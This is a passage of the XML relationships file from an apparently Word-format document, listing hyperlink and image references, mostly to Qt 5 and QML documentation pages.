Target="http://doc.qt.io/qt-5/qml-qtqml-statemachine-historystate.html" TargetMode="External"/><Relationship Id="rId1056" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtpositioning-location.html" TargetMode="External"/><Relationship Id="rId1263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-window-screen.html" TargetMode="External"/><Relationship Id="rId2107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgrendererinterface.html" TargetMode="External"/><Relationship Id="rId2314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId2661" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsqltablemodel.html" TargetMode="External"/><Relationship Id="rId2759" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-customitems-tabwidget-example.html" TargetMode="External"/><Relationship Id="rId2966" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-usecase-integratingjs.html" TargetMode="External"/><Relationship Id="rId840" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-columnlayout.html" TargetMode="External"/><Relationship Id="rId938" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebengine-formvalidationmessagerequest.html" TargetMode="External"/><Relationship Id="rId1470" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwayland-compositor-wlshell.html" TargetMode="External"/><Relationship Id="rId1568" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-index.html" TargetMode="External"/><Relationship Id="rId1775" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId2521" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.johnwordsworth.com/projects/photoshop-sprite-sheet-generator-script" TargetMode="External"/><Relationship Id="rId2619" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-models-objectlistmodel-example.html" TargetMode="External"/><Relationship Id="rId2826" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgmaterialshader.html" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-string.html" TargetMode="External"/><Relationship Id="rId700" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-abstractgraph3d.html" TargetMode="External"/><Relationship Id="rId1123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-numberkey.html" TargetMode="External"/><Relationship Id="rId1330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-stenciltest.html" TargetMode="External"/><Relationship Id="rId1428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-vector3d.html" TargetMode="External"/><Relationship Id="rId1635" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pathview.html" TargetMode="External"/><Relationship Id="rId1982" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId1842" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-particles-performance.html" TargetMode="External"/><Relationship Id="rId1702" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-qmldir.html" TargetMode="External"/><Relationship Id="rId490" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-textinput.html" TargetMode="External"/><Relationship Id="rId2171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-numberanimation.html" TargetMode="External"/><Relationship Id="rId3015" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qmlscene.html" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-typesystem-objecttypes.html" TargetMode="External"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/button-types.png" TargetMode="External"/><Relationship Id="rId588" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtgraphicaleffects/graphicaleffects.html" TargetMode="External"/><Relationship Id="rId795" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-candlestickset.html" TargetMode="External"/><Relationship Id="rId2031" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2476" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-sequentialanimation.html" TargetMode="External"/><Relationship Id="rId2683" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2890" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlcontext.html" TargetMode="External"/><Relationship Id="rId448" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-canvas.html" TargetMode="External"/><Relationship Id="rId655" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-module.html" TargetMode="External"/><Relationship Id="rId862" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-cuboidgeometry.html" TargetMode="External"/><Relationship Id="rId1078" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-matrix4x4.html" TargetMode="External"/><Relationship Id="rId1285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-shortcut.html" TargetMode="External"/><Relationship Id="rId1492" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-loader.html" TargetMode="External"/><Relationship Id="rId2129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgnode.html" TargetMode="External"/><Relationship Id="rId2336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId2543" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-animation-example.html" TargetMode="External"/><Relationship Id="rId2750" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-objecttypes.html" TargetMode="External"/><Relationship Id="rId2988" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qt5-intro.html" TargetMode="External"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-objecttypes.html" TargetMode="External"/><Relationship Id="rId515" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/qml-uses-layouts-direct.png" TargetMode="External"/><Relationship Id="rId722" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-analogaxisinput.html" TargetMode="External"/><Relationship Id="rId1145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pathanimation.html" TargetMode="External"/><Relationship Id="rId1352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-tableviewcolumn.html" TargetMode="External"/><Relationship Id="rId1797" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-dialog.html" TargetMode="External"/><Relationship Id="rId2403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2848" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgvertexcolormaterial.html" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId1005" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-irproximityreading.html" TargetMode="External"/><Relationship Id="rId1212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-core-quaternionanimation.html" TargetMode="External"/><Relationship Id="rId1657" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-localstorage-qmlmodule.html" TargetMode="External"/><Relationship Id="rId1864" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-customparticle.html" TargetMode="External"/><Relationship Id="rId2610" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qstringlist.html" TargetMode="External"/><Relationship Id="rId2708" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2915" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId1517" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-connections.html" TargetMode="External"/><Relationship Id="rId1724" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId1931" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qtquicktest.html" TargetMode="External"/><Relationship Id="rId3037" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId2193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-multipointtoucharea.html" TargetMode="External"/><Relationship Id="rId2498" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-statechangescript.html" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlcomponent.html" TargetMode="External"/><Relationship Id="rId677" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtglobal.html" TargetMode="External"/><Relationship Id="rId2053" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-grid.html" TargetMode="External"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qjsengine.html" TargetMode="External"/><Relationship Id="rId884" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-dialog.html" TargetMode="External"/><Relationship Id="rId2120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2565" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/listview-section.png" TargetMode="External"/><Relationship Id="rId2772" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId537" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-controls-styles-qmlmodule.html" TargetMode="External"/><Relationship Id="rId744" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebengine-authenticationdialogrequest.html" TargetMode="External"/><Relationship Id="rId951" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-geocodemodel.html" TargetMode="External"/><Relationship Id="rId1167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-piemenustyle.html" TargetMode="External"/><Relationship Id="rId1374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcanvas3d-textureimagefactory.html" TargetMode="External"/><Relationship Id="rId1581" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-index.html" TargetMode="External"/><Relationship Id="rId1679" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId2218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2632" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/model-view-programming.html" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId604" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-gaussianblur.html" TargetMode="External"/><Relationship Id="rId811" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-canvasimagedata.html" TargetMode="External"/><Relationship Id="rId1027" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-keyboardrow.html" TargetMode="External"/><Relationship Id="rId1234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-renderstate.html" TargetMode="External"/><Relationship Id="rId1441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-wander.html" TargetMode="External"/><Relationship Id="rId1886" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-turbulence.html" TargetMode="External"/><Relationship Id="rId2937" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmetaobject.html" TargetMode="External"/><Relationship Id="rId909" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-ellipseshape.html" TargetMode="External"/><Relationship Id="rId1301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-spinbox.html" TargetMode="External"/><Relationship Id="rId1539" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1746" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1953" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-hostenvironment.html" TargetMode="External"/><Relationship Id="rId1606" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-window-window.html" TargetMode="External"/><Relationship Id="rId1813" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsettings.html" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-index.html" TargetMode="External"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebview-webview.html" TargetMode="External"/><Relationship Id="rId2075" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-textarea.html" TargetMode="External"/><Relationship Id="rId2282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-textinput.html" TargetMode="External"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId699" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-abstractdataproxy.html" TargetMode="External"/><Relationship Id="rId1091" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt-labs-platform-menuitemgroup.html" TargetMode="External"/><Relationship Id="rId2587" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-demos-rssnews-example.html" TargetMode="External"/><Relationship Id="rId2794" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-topic.html" TargetMode="External"/><Relationship Id="rId461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtmultimedia-index.html" TargetMode="External"/><Relationship Id="rId559" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlapplicationengine.html" TargetMode="External"/><Relationship Id="rId766" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-borderimagemesh.html" TargetMode="External"/><Relationship Id="rId1189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-popup.html" TargetMode="External"/><Relationship Id="rId1396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-touchinputhandler3d.html" TargetMode="External"/><Relationship Id="rId2142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-scenegraph-simplematerial-example.html" TargetMode="External"/><Relationship Id="rId2447" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-parallelanimation.html" TargetMode="External"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtplugin.html" TargetMode="External"/><Relationship Id="rId419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-basictypes.html" TargetMode="External"/><Relationship Id="rId626" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qlist.html" TargetMode="External"/><Relationship Id="rId973" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-handwritinginputpanel.html" TargetMode="External"/><Relationship Id="rId1049" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-lineshape.html" TargetMode="External"/><Relationship Id="rId1256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-scatter3d.html" TargetMode="External"/><Relationship Id="rId2002" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometrynode.html" TargetMode="External"/><Relationship Id="rId2307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2654" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qabstractitemmodel.html" TargetMode="External"/><Relationship Id="rId2861" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2959" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qtcreator/creator-using-qt-quick-designer.html" TargetMode="External"/><Relationship Id="rId833" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebengine-colordialogrequest.html" TargetMode="External"/><Relationship Id="rId1116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-nodepthmask.html" TargetMode="External"/><Relationship Id="rId1463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebsockets-websocketserver.html" TargetMode="External"/><Relationship Id="rId1670" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId1768" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-gridlayout.html" TargetMode="External"/><Relationship Id="rId2514" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-effects-sprites.html" TargetMode="External"/><Relationship Id="rId2721" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId2819" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometry-attribute.html" TargetMode="External"/><Relationship Id="rId900" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-doublevalidator.html" TargetMode="External"/><Relationship Id="rId1323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-statusbar.html" TargetMode="External"/><Relationship Id="rId1530" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qt.html" TargetMode="External"/><Relationship Id="rId1628" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId1975" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometry.html" TargetMode="External"/><Relationship Id="rId1835" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-trailemitter.html" TargetMode="External"/><Relationship Id="rId1902" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2097" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/visualize-batches.png" TargetMode="External"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId483" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pincharea.html" TargetMode="External"/><Relationship Id="rId690" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/newclasses58.html" TargetMode="External"/><Relationship Id="rId2164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId2371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-row.html" TargetMode="External"/><Relationship Id="rId3008" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/modules-qml.html" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-vector2d.html" TargetMode="External"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-structure.html" TargetMode="External"/><Relationship Id="rId550" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId788" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtmultimedia-cameraflash.html" TargetMode="External"/><Relationship Id="rId995" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-inputcontext.html" TargetMode="External"/><Relationship 